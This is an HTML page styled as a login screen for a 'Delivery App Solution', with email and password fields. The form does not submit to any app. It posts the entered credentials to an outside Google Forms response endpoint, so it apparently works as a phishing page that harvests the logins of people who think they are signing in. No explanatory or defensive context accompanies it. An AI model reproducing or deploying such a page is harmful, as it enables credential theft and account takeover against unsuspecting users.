<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {font-family: Arial, Helvetica, sans-serif;}
form {border: none;}

input[type=text], input[type=password] {
    width: 100%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #768bef;
    box-sizing: border-box;
    border-radius: 12px;
}

button {
    background-color: #1371ff;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 100%;
    border-radius: 12px;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 40%;
  border-radius: 50%;
}

.container {
  padding: 16px;
    margin: 4vw;
}

span.psw {
  float: right;
  padding-top: 16px;
}

h2 {
    font-family: Geometric, sans-serif;
    margin-left: 21vw;
    margin-right: 21vw;
    font-size: 5vw;
    color: #1371ff;
    }
    
/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body>

<h2>Delivery App Solution</h2>

<form  action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSdmxnZWiXeMvx-T8eb1C41zmEd6rzStlEjkmNfCXV_z3BZa5Q/formResponse" target="_blank" method="post">
  <div class="imgcontainer">
  </div>

  <div class="container">
    <label id="uname"><b>Email Address</b></label>
    <input id="name" type="text" placeholder="Enter Username" name="entry.1265210883" required>

    <label for="psw"><b>Password</b></label>
    <input type="password" placeholder="Enter Password" name="entry.1632094393" required>
        
    <button type="submit">Login</button>
    <label>
      <input type="checkbox" checked="checked" name="remember"> Remember me
    </label>
  </div>

  </div>
 

</form>
</body>
</html>
